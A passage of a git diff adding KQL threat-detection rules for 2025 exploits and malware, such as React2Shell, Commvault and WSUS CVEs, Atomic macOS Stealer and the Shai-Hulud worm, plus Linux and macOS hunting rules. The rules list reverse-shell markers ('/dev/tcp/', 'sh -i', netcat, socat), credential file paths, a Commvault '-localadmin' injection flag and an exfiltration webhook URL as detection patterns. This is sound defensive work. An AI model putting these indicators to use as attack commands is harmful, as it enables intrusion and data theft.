+| where ((InitiatingProcessCommandLine contains "--experimental-https" or InitiatingProcessCommandLine contains "--experimental-next-config-strip-types" or InitiatingProcessCommandLine contains "/node_modules/next" or InitiatingProcessCommandLine contains "next dev" or InitiatingProcessCommandLine contains "next start" or InitiatingProcessCommandLine contains "node_modules/.bin" or InitiatingProcessCommandLine contains "react-scripts start" or InitiatingProcessCommandLine contains "start-server.js") and InitiatingProcessFolderPath endswith "/node") and (((ProcessCommandLine contains "/dev/tcp/" or ProcessCommandLine contains "/dev/udp/" or ProcessCommandLine contains "/etc/hosts" or ProcessCommandLine contains "/etc/passwd" or ProcessCommandLine contains "/etc/shadow" or ProcessCommandLine contains "base64" or ProcessCommandLine contains "cat " or ProcessCommandLine contains "curl" or ProcessCommandLine contains "dig" or ProcessCommandLine contains "ifconfig" or ProcessCommandLine contains "IO::Socket::INET" or ProcessCommandLine contains "java" or ProcessCommandLine contains "less " or ProcessCommandLine contains "lua" or ProcessCommandLine contains "mkfifo " or ProcessCommandLine contains "more" or ProcessCommandLine contains "nc " or ProcessCommandLine contains "ncat" or ProcessCommandLine contains "netcat" or ProcessCommandLine contains "netstat" or ProcessCommandLine contains "nslookup" or ProcessCommandLine contains "perl" or ProcessCommandLine contains "php" or ProcessCommandLine contains "ping" or ProcessCommandLine contains "ps -ef" or ProcessCommandLine contains "ps aux" or ProcessCommandLine contains "python" or ProcessCommandLine contains "rcat" or ProcessCommandLine contains "ruby" or ProcessCommandLine contains "sh -i 2>&1" or ProcessCommandLine contains "-c id" or ProcessCommandLine contains "socat" or ProcessCommandLine contains "uname" or ProcessCommandLine contains "wget" or ProcessCommandLine contains "whoami") or ((FolderPath endswith "/busybox" or FolderPath endswith "/cat" or FolderPath endswith "/curl" or FolderPath endswith "/dash" or FolderPath endswith "/dig" or FolderPath endswith "/head" or FolderPath endswith "/id" or FolderPath endswith "/ifconfig" or FolderPath endswith "/ip" or FolderPath endswith "/java" or FolderPath endswith "/less" or FolderPath endswith "/lua" or FolderPath endswith "/more" or FolderPath endswith "/nc" or FolderPath endswith "/ncat" or FolderPath endswith "/netcat" or FolderPath endswith "/netstat" or FolderPath endswith "/nslookup" or FolderPath endswith "/perl" or FolderPath endswith "/ping" or FolderPath endswith "/python" or FolderPath endswith "/python2" or FolderPath endswith "/ruby" or FolderPath endswith "/socat" or FolderPath endswith "/tail" or FolderPath endswith "/wget" or FolderPath endswith "/whoami") or FolderPath contains "/python")) or (FolderPath endswith "/sh" and (not(FolderPath endswith "-c"))) or ((FolderPath endswith "-c" and FolderPath endswith "/sh") and (ProcessCommandLine contains "/dev/tcp/" or ProcessCommandLine contains "/dev/udp/" or ProcessCommandLine contains "/etc/hosts" or ProcessCommandLine contains "/etc/passwd" or ProcessCommandLine contains "/etc/shadow" or ProcessCommandLine contains "base64" or ProcessCommandLine contains "cat " or ProcessCommandLine contains "curl" or ProcessCommandLine contains "dig" or ProcessCommandLine contains "ifconfig" or ProcessCommandLine contains "IO::Socket::INET" or ProcessCommandLine contains "java" or ProcessCommandLine contains "less " or ProcessCommandLine contains "lua" or ProcessCommandLine contains "mkfifo " or ProcessCommandLine contains "more" or ProcessCommandLine contains "nc " or ProcessCommandLine contains "ncat" or ProcessCommandLine contains "netcat" or ProcessCommandLine contains "netstat" or ProcessCommandLine contains "nslookup" or ProcessCommandLine contains "perl" or ProcessCommandLine contains "php" or ProcessCommandLine contains "ping" or ProcessCommandLine contains "ps -ef" or ProcessCommandLine contains "ps aux" or ProcessCommandLine contains "python" or ProcessCommandLine contains "rcat" or ProcessCommandLine contains "ruby" or ProcessCommandLine contains "sh -i 2>&1" or ProcessCommandLine contains "-c id" or ProcessCommandLine contains "socat" or ProcessCommandLine contains "uname" or ProcessCommandLine contains "wget" or ProcessCommandLine contains "whoami")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-55182/windows_suspicious_child_process_from_node_js_react2shell.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-55182/windows_suspicious_child_process_from_node_js_react2shell.kql
new file mode 100644
index 00000000..9d3f7330
--- /dev/null
+++ b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-55182/windows_suspicious_child_process_from_node_js_react2shell.kql
@@ -0,0 +1,13 @@
+// Title: Windows Suspicious Child Process from Node.js - React2Shell
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems), Nasreddine Bencherchali
+// Date: 2025-12-05
+// Level: high
+// Description: Detects suspicious child processes started by Node.js server processes on Windows, which may indicate exploitation of vulnerabilities like CVE-2025-55182 (React2Shell).
+// Attackers can abuse the Node.js 'child_process' module to run system commands or scripts using methods such as spawn(), exec(), execFile(), fork(), or execSync().
+// If execSync() or exec() is used in the exploit, the command line often shows a shell (e.g., cmd.exe /d /s /c ...) running a suspicious command unless other shells are explicitly invoked.
+// For other methods, the spawned process appears directly in the Image field unless a shell is explicitly used.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.initial-access, attack.t1190, detection.emerging-threats, cve.2025-55182
+
+DeviceProcessEvents
+| where ((InitiatingProcessCommandLine contains "--experimental-https" or InitiatingProcessCommandLine contains "--experimental-next-config-strip-types" or InitiatingProcessCommandLine contains "\\node_modules\\next" or InitiatingProcessCommandLine contains "next dev" or InitiatingProcessCommandLine contains "next start" or InitiatingProcessCommandLine contains "next\" start" or InitiatingProcessCommandLine contains "node_modules\\.bin\\\\..\\next" or InitiatingProcessCommandLine contains "react-scripts start" or InitiatingProcessCommandLine contains "start-server.js") and InitiatingProcessFolderPath endswith "\\node.exe") and (((ProcessCommandLine contains "\\net" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "certutil " or ProcessCommandLine contains "conhost --headless" or ProcessCommandLine contains "cscript " or ProcessCommandLine contains "curl" or ProcessCommandLine contains "ipconfig" or ProcessCommandLine contains "java" or ProcessCommandLine contains "lua" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "netsh" or ProcessCommandLine contains "nslookup " or ProcessCommandLine contains "perl" or ProcessCommandLine contains "ping " or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "python" or ProcessCommandLine contains "reg " or ProcessCommandLine contains "reg.exe" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "ruby" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "sc.exe" or ProcessCommandLine contains "systeminfo" or ProcessCommandLine contains "wget" or ProcessCommandLine contains "whoami" or ProcessCommandLine contains "wmic" or ProcessCommandLine contains "wscript") or ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\ipconfig.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netsh.exe" or FolderPath endswith "\\nslookup.exe" or FolderPath endswith "\\OpenConsole.exe" or FolderPath endswith "\\perl.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\py.exe" or FolderPath endswith "\\python.exe" or FolderPath endswith "\\pythonw.exe" or FolderPath endswith "\\pyw.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\sc.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\wget.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wt.exe") or FolderPath contains "\\python")) or (FolderPath endswith "\\cmd.exe" and (not(ProcessCommandLine contains "/d /s /c "))) or ((ProcessCommandLine contains "/d /s /c " and FolderPath endswith "\\cmd.exe") and (not((ProcessCommandLine contains "git config --local --get remote.origin.url" or (ProcessCommandLine contains "\\mkcert\\" and ProcessCommandLine contains " -CAROOT") or (ProcessCommandLine contains "\\mkcert\\" and ProcessCommandLine contains " -install ") or (ProcessCommandLine contains "netstat -ano | findstr /C:" and ProcessCommandLine contains " | findstr LISTENING"))))))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-57788/commvault_qlogin_with_publicsharinguser_and_guid_password_cve_2025_57788_.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-57788/commvault_qlogin_with_publicsharinguser_and_guid_password_cve_2025_57788_.kql
new file mode 100644
index 00000000..57830565
--- /dev/null
+++ b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-57788/commvault_qlogin_with_publicsharinguser_and_guid_password_cve_2025_57788_.kql
@@ -0,0 +1,13 @@
+// Title: Commvault QLogin with PublicSharingUser and GUID Password (CVE-2025-57788)
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-10-20
+// Level: medium
+// Description: Detects a qlogin.exe command attempting to authenticate as the internal `_+_PublicSharingUser_` using a GUID as the password.
+// This could be an indicator of an attacker exploiting CVE-2025-57788 to gain initial access using leaked credentials.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.initial-access, attack.t1078.001, detection.emerging-threats, cve.2025-57788
+// False Positives:
+//   - Legitimate administrative scripts that use the `_+_PublicSharingUser_` account for valid purposes.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "qlogin" and ProcessCommandLine contains "_+_PublicSharingUser_") and ProcessCommandLine matches regex "[A-F0-9]{8}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{12}"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-57790/commvault_qoperation_path_traversal_webshell_drop_cve_2025_57790_.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-57790/commvault_qoperation_path_traversal_webshell_drop_cve_2025_57790_.kql
new file mode 100644
index 00000000..de3a5dc5
--- /dev/null
+++ b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-57790/commvault_qoperation_path_traversal_webshell_drop_cve_2025_57790_.kql
@@ -0,0 +1,11 @@
+// Title: Commvault QOperation Path Traversal Webshell Drop (CVE-2025-57790)
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-10-20
+// Level: high
+// Description: Detects the use of qoperation.exe with the -file argument to write a JSP file to the webroot, indicating a webshell drop.
+// This is a post-authentication step corresponding to CVE-2025-57790.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1505.003, detection.emerging-threats, cve.2025-57790
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "qoperation" and ProcessCommandLine contains "exec" and ProcessCommandLine contains " -af " and ProcessCommandLine contains ".xml " and ProcessCommandLine contains "\\Apache\\webapps\\ROOT\\" and ProcessCommandLine contains ".jsp"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-57791/commvault_qlogin_argument_injection_authentication_bypass_cve_2025_57791_.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-57791/commvault_qlogin_argument_injection_authentication_bypass_cve_2025_57791_.kql
new file mode 100644
index 00000000..f481a546
--- /dev/null
+++ b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-57791/commvault_qlogin_argument_injection_authentication_bypass_cve_2025_57791_.kql
@@ -0,0 +1,11 @@
+// Title: Commvault QLogin Argument Injection Authentication Bypass (CVE-2025-57791)
+// Author: X__Junior (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-10-20
+// Level: high
+// Description: Detects the use of argument injection in the Commvault qlogin command - potential exploitation for CVE-2025-57791.
+// An attacker can inject the `-localadmin` parameter via the password field to bypass authentication and gain a privileged token.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1190, detection.emerging-threats, cve.2025-57791
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "qlogin" and ProcessCommandLine contains " -cs " and ProcessCommandLine contains " -localadmin" and ProcessCommandLine contains " -clp " and ProcessCommandLine contains "_localadmin__"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-59287/exploitation_activity_of_cve_2025_59287_wsus_suspicious_child_process.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-59287/exploitation_activity_of_cve_2025_59287_wsus_suspicious_child_process.kql
new file mode 100644
index 00000000..08ee0c7b
--- /dev/null
+++ b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-59287/exploitation_activity_of_cve_2025_59287_wsus_suspicious_child_process.kql
@@ -0,0 +1,13 @@
+// Title: Exploitation Activity of CVE-2025-59287 - WSUS Suspicious Child Process
+// Author: Huntress Labs, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-10-31
+// Level: high
+// Description: Detects the creation of command-line interpreters (cmd.exe, powershell.exe) as child processes of Windows Server Update Services (WSUS) related process wsusservice.exe.
+// This behavior is a key indicator of exploitation for the critical remote code execution vulnerability such as CVE-2025-59287, where attackers spawn shells to conduct reconnaissance and further post-exploitation activities.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.initial-access, attack.t1190, attack.t1203, cve.2025-59287, detection.emerging-threats
+// False Positives:
+//   - If this activity is expected, consider filtering based on specific command lines, user context (e.g., `nt authority\network service`), or parent process command lines to reduce noise.
+
+DeviceProcessEvents
+| where ((InitiatingProcessCommandLine contains "WsusPool" and InitiatingProcessFolderPath endswith "\\w3wp.exe") or InitiatingProcessFolderPath endswith "\\wsusservice.exe") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\powershell_ise.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2025/Malware/Atomic-MacOS-Stealer/atomic_macos_stealer_filegrabber_activity.kql b/KQL/rules-emerging-threats/2025/Malware/Atomic-MacOS-Stealer/atomic_macos_stealer_filegrabber_activity.kql
new file mode 100644
index 00000000..6d5f7945
--- /dev/null
+++ b/KQL/rules-emerging-threats/2025/Malware/Atomic-MacOS-Stealer/atomic_macos_stealer_filegrabber_activity.kql
@@ -0,0 +1,10 @@
+// Title: Atomic MacOS Stealer - FileGrabber Activity
+// Author: Jason Phang Vern - Onn, Robbin Ooi Zhen Heng (Gen Digital)
+// Date: 2025-11-22
+// Level: high
+// Description: Detects suspicious activity associated with Atomic MacOS Stealer (Amos) campaigns, including execution of FileGrabber and curl-based POST requests used for data exfiltration. The rule identifies either the execution of FileGrabber targeting /tmp or the use of curl to POST sensitive user data (including files such as /tmp/out.zip) to remote servers, which are key indicators of Amos infostealer activity.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.002, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "curl" and ProcessCommandLine contains "POST" and ProcessCommandLine contains "user:" and ProcessCommandLine contains "-H " and ProcessCommandLine contains "BuildID" and ProcessCommandLine contains "file=@/tmp/out.zip" and ProcessCommandLine contains "cl: 0") or (ProcessCommandLine contains "FileGrabber" and ProcessCommandLine contains "/tmp")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2025/Malware/Atomic-MacOS-Stealer/atomic_macos_stealer_persistence_indicators.kql b/KQL/rules-emerging-threats/2025/Malware/Atomic-MacOS-Stealer/atomic_macos_stealer_persistence_indicators.kql
new file mode 100644
index 00000000..51ba564e
--- /dev/null
+++ b/KQL/rules-emerging-threats/2025/Malware/Atomic-MacOS-Stealer/atomic_macos_stealer_persistence_indicators.kql
@@ -0,0 +1,10 @@
+// Title: Atomic MacOS Stealer - Persistence Indicators
+// Author: Jason Phang Vern - Onn, Robbin Ooi Zhen Heng (Gen Digital)
+// Date: 2025-11-22
+// Level: high
+// Description: Detects creation of persistence artifacts placed by Atomic MacOS Stealer in macOS systems. Recent Atomic MacOS Stealer variants have been observed dropping these to maintain persistent access after compromise.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1564.001, attack.t1543.004, detection.emerging-threats
+
+DeviceFileEvents
+| where FolderPath =~ "/Library/LaunchDaemons/com.finder.helper.plist" or (InitiatingProcessFolderPath endswith "/curl" and FolderPath endswith ".helper" and FolderPath startswith "/Users/")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2025/Malware/Grixba/grixba_malware_reconnaissance_activity.kql b/KQL/rules-emerging-threats/2025/Malware/Grixba/grixba_malware_reconnaissance_activity.kql
new file mode 100644
index 00000000..bbdd647f
--- /dev/null
+++ b/KQL/rules-emerging-threats/2025/Malware/Grixba/grixba_malware_reconnaissance_activity.kql
@@ -0,0 +1,13 @@
+// Title: Grixba Malware Reconnaissance Activity
+// Author: yxinmiracle, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-11-26
+// Level: high
+// Description: Detects execution of the Grixba reconnaissance tool based on suspicious command-line parameter combinations.
+// This tool is used by the Play ransomware group for network enumeration, data gathering, and event log clearing.
+// MITRE Tactic: Reconnaissance
+// Tags: attack.reconnaissance, attack.t1595.001, attack.discovery, attack.t1046, detection.emerging-threats
+// False Positives:
+//   - Legitimate tools that use similar command-line argument structures (e.g., a tool with '--mode scan' and '--input file.txt') could trigger this rule. However, the specific combinations are indicative of reconnaissance or defense evasion.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-i " or ProcessCommandLine contains "-input " or ProcessCommandLine contains "-i:" or ProcessCommandLine contains "-input:") and (ProcessCommandLine contains ":f " or ProcessCommandLine contains ":r " or ProcessCommandLine contains ":s " or ProcessCommandLine contains " f " or ProcessCommandLine contains " r " or ProcessCommandLine contains " s ") and (ProcessCommandLine contains "-m " or ProcessCommandLine contains "-mode " or ProcessCommandLine contains "-m:" or ProcessCommandLine contains "-mode:") and (ProcessCommandLine contains "scan " or ProcessCommandLine contains "scanall ")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2025/Malware/Katz-Stealer/katz_stealer_dll_loaded.kql b/KQL/rules-emerging-threats/2025/Malware/Katz-Stealer/katz_stealer_dll_loaded.kql
new file mode 100644
index 00000000..efd89ce0
--- /dev/null
+++ b/KQL/rules-emerging-threats/2025/Malware/Katz-Stealer/katz_stealer_dll_loaded.kql
@@ -0,0 +1,14 @@
+// Title: Katz Stealer DLL Loaded
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-05-22
+// Level: high
+// Description: Detects loading of DLLs associated with Katz Stealer malware 2025 variants.
+// Katz Stealer is a malware variant that is known to be used for stealing sensitive information from compromised systems.
+// The process that loads these DLLs are very likely to be malicious.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1129, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\katz_ontop.dll" or FolderPath endswith "\\AppData\\Local\\Temp\\received_dll.dll"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2025/Malware/Shai-Hulud/shai_hulud_malicious_github_workflow_creation.kql b/KQL/rules-emerging-threats/2025/Malware/Shai-Hulud/shai_hulud_malicious_github_workflow_creation.kql
new file mode 100644
index 00000000..65049b31
--- /dev/null
+++ b/KQL/rules-emerging-threats/2025/Malware/Shai-Hulud/shai_hulud_malicious_github_workflow_creation.kql
@@ -0,0 +1,12 @@
+// Title: Shai-Hulud Malicious GitHub Workflow Creation
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-09-24
+// Level: high
+// Description: Detects creation of shai-hulud-workflow.yml file associated with Shai Hulud worm targeting NPM supply chain attack that exfiltrates GitHub secrets
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.credential-access, attack.t1552.001, attack.collection, attack.t1119, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceFileEvents
+| where FolderPath endswith ".github/workflows/shai-hulud-workflow.yml"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2025/Malware/Shai-Hulud/shai_hulud_npm_package_malicious_exfiltration_via_curl.kql b/KQL/rules-emerging-threats/2025/Malware/Shai-Hulud/shai_hulud_npm_package_malicious_exfiltration_via_curl.kql
new file mode 100644
index 00000000..40984ec0
--- /dev/null
+++ b/KQL/rules-emerging-threats/2025/Malware/Shai-Hulud/shai_hulud_npm_package_malicious_exfiltration_via_curl.kql
@@ -0,0 +1,12 @@
+// Title: Shai-Hulud NPM Package Malicious Exfiltration via Curl
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-09-24
+// Level: high
+// Description: Detects potential Shai Hulud NPM package attack attempting to exfiltrate data via curl to external webhook sites.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1041, attack.collection, attack.t1005, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "curl" and ProcessCommandLine contains "-d" and ProcessCommandLine contains "webhook.site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7") and FolderPath endswith "/curl"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2025/Malware/funklocker_ransomware_file_creation.kql b/KQL/rules-emerging-threats/2025/Malware/funklocker_ransomware_file_creation.kql
new file mode 100644
index 00000000..61cfef4f
--- /dev/null
+++ b/KQL/rules-emerging-threats/2025/Malware/funklocker_ransomware_file_creation.kql
@@ -0,0 +1,12 @@
+// Title: FunkLocker Ransomware File Creation
+// Author: Saiprashanth Pulisetti ( @Prashanthblogs)
+// Date: 2025-08-08
+// Level: high
+// Description: Detects the creation of files with the ".funksec" extension, which is appended to encrypted files by the FunkLocker ransomware.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1486, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceFileEvents
+| where FolderPath endswith ".funksec"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2025/Malware/kalambur_backdoor_curl_tor_socks_proxy_execution.kql b/KQL/rules-emerging-threats/2025/Malware/kalambur_backdoor_curl_tor_socks_proxy_execution.kql
new file mode 100644
index 00000000..4da9174c
--- /dev/null
+++ b/KQL/rules-emerging-threats/2025/Malware/kalambur_backdoor_curl_tor_socks_proxy_execution.kql
@@ -0,0 +1,12 @@
+// Title: Kalambur Backdoor Curl TOR SOCKS Proxy Execution
+// Author: Arda Buyukkaya (EclecticIQ)
+// Date: 2025-02-11
+// Level: high
+// Description: Detects the execution of the "curl.exe" command, referencing "SOCKS" and ".onion" domains, which could be indicative of Kalambur backdoor activity.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.command-and-control, attack.t1090, attack.t1573, attack.t1071.001, attack.t1059.001, attack.s0183, detection.emerging-threats
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "\\curl.exe" and ProcessCommandLine contains ".onion" and (ProcessCommandLine contains "socks5h://" or ProcessCommandLine contains "socks5://" or ProcessCommandLine contains "socks4a://")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/linux/file/file_event/potentially_suspicious_long_filename_pattern_linux.kql b/KQL/rules-threat-hunting/linux/file/file_event/potentially_suspicious_long_filename_pattern_linux.kql
new file mode 100644
index 00000000..33bcdce3
--- /dev/null
+++ b/KQL/rules-threat-hunting/linux/file/file_event/potentially_suspicious_long_filename_pattern_linux.kql
@@ -0,0 +1,14 @@
+// Title: Potentially Suspicious Long Filename Pattern - Linux
+// Author: @kostastsale
+// Date: 2025-11-22
+// Level: low
+// Description: Detects the creation of files with unusually long filenames (100 or more characters), which may indicate obfuscation techniques used by malware such as VShell.
+// This is a hunting rule to identify potential threats that use long filenames to evade detection. Keep in mind that on a legitimate system, such long filenames can and are common. Run this detection in the context of threat hunting rather than alerting.
+// Adjust the threshold of filename length as needed based on your environment.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.004, attack.defense-evasion, attack.t1027, detection.threat-hunting
+// False Positives:
+//   - Legitimate files with long filenames.
+
+DeviceFileEvents
+| where FolderPath matches regex "[^/]{100,}$" and (not((FolderPath startswith "/run/systemd/units/invocation:systemd-fsck@" or FolderPath startswith "/sys/firmware/" or FolderPath startswith "/var/log/journal/")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/linux/file/file_event/python_path_configuration_file_creation_linux.kql b/KQL/rules-threat-hunting/linux/file/file_event/python_path_configuration_file_creation_linux.kql
new file mode 100644
index 00000000..f30726ea
--- /dev/null
+++ b/KQL/rules-threat-hunting/linux/file/file_event/python_path_configuration_file_creation_linux.kql
@@ -0,0 +1,14 @@
+// Title: Python Path Configuration File Creation - Linux
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2024-04-25
+// Level: medium
+// Description: Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence.
+// Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script.
+// Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.006, detection.threat-hunting
+// False Positives:
+//   - Although .pth files are discouraged due to potential security implications, these are legitimate files by specification.
+
+DeviceFileEvents
+| where FolderPath endswith ".pth" and FolderPath matches regex "(?i)/lib/python3\\.([5-9]|[0-9]{2})/site-packages/"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/linux/process_creation/process_discovery.kql b/KQL/rules-threat-hunting/linux/process_creation/process_discovery.kql
new file mode 100644
index 00000000..c8ef2920
--- /dev/null
+++ b/KQL/rules-threat-hunting/linux/process_creation/process_discovery.kql
@@ -0,0 +1,13 @@
+// Title: Process Discovery
+// Author: Ömer Günal, oscd.community, CheraaghiMilad
+// Date: 2020-10-06
+// Level: low
+// Description: Detects process discovery commands. Adversaries may attempt to get information about running processes on a system.
+// Information obtained could be used to gain an understanding of common software/applications running on systems within the network
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1057, detection.threat-hunting
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where FolderPath endswith "/atop" or FolderPath endswith "/htop" or FolderPath endswith "/pgrep" or FolderPath endswith "/ps" or FolderPath endswith "/pstree" or FolderPath endswith "/top"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/linux/process_creation/terminate_linux_process_via_kill.kql b/KQL/rules-threat-hunting/linux/process_creation/terminate_linux_process_via_kill.kql
new file mode 100644
index 00000000..d37fc7ef
--- /dev/null
+++ b/KQL/rules-threat-hunting/linux/process_creation/terminate_linux_process_via_kill.kql
@@ -0,0 +1,10 @@
+// Title: Terminate Linux Process Via Kill
+// Author: Tuan Le (NCSGroup)
+// Date: 2023-03-16
+// Level: medium
+// Description: Detects usage of command line tools such as "kill", "pkill" or "killall" to terminate or signal a running process.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562, detection.threat-hunting
+
+DeviceProcessEvents
+| where FolderPath endswith "/kill" or FolderPath endswith "/killall" or FolderPath endswith "/pkill" or FolderPath endswith "/xkill"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/macos/file/file_event/python_path_configuration_file_creation_macos.kql b/KQL/rules-threat-hunting/macos/file/file_event/python_path_configuration_file_creation_macos.kql
new file mode 100644
index 00000000..f843fd86
--- /dev/null
+++ b/KQL/rules-threat-hunting/macos/file/file_event/python_path_configuration_file_creation_macos.kql
@@ -0,0 +1,14 @@
+// Title: Python Path Configuration File Creation - MacOS
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2024-04-25
+// Level: medium
+// Description: Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence.
+// Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script.
+// Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.006, detection.threat-hunting
+// False Positives:
+//   - Although .pth files are discouraged due to potential security implications, these are legitimate files by specification.
+
+DeviceFileEvents
+| where FolderPath endswith ".pth" and FolderPath matches regex "(?i)/lib/python3\\.([5-9]|[0-9]{2})/site-packages/"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/macos/process_creation/clipboard_data_collection_via_pbpaste.kql b/KQL/rules-threat-hunting/macos/process_creation/clipboard_data_collection_via_pbpaste.kql
new file mode 100644
index 00000000..0f8ca697
--- /dev/null
+++ b/KQL/rules-threat-hunting/macos/process_creation/clipboard_data_collection_via_pbpaste.kql
@@ -0,0 +1,16 @@
+// Title: Clipboard Data Collection Via Pbpaste
+// Author: Daniel Cortez
+// Date: 2024-07-30
+// Level: medium
+// Description: Detects execution of the "pbpaste" utility, which retrieves the contents of the clipboard (a.k.a. pasteboard) and writes them to the standard output (stdout).
+// The utility is often used for creating new files with the clipboard content or for piping clipboard contents to other commands.
+// It can also be used in shell scripts that may require clipboard content as input.
+// Attackers can abuse this utility in order to collect data from the user clipboard, which may contain passwords or sensitive information.
+// Use this rule to hunt for potential abuse of the utility by looking at the parent process and any potentially suspicious command line content.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.credential-access, attack.t1115, detection.threat-hunting
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where FolderPath endswith "/pbpaste"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/file/file_access/access_to_browser_credential_files_by_uncommon_applications.kql b/KQL/rules-threat-hunting/windows/file/file_access/access_to_browser_credential_files_by_uncommon_applications.kql
new file mode 100644
index 00000000..1c745702
--- /dev/null
